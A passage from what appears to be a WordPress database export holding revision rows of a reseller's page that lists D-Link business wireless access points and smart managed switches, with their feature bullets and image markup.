applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:45:44','2019-09-25 04:45:44','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3379,1,'2019-09-25 12:46:19','2019-09-25 04:46:19','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:46:19','2019-09-25 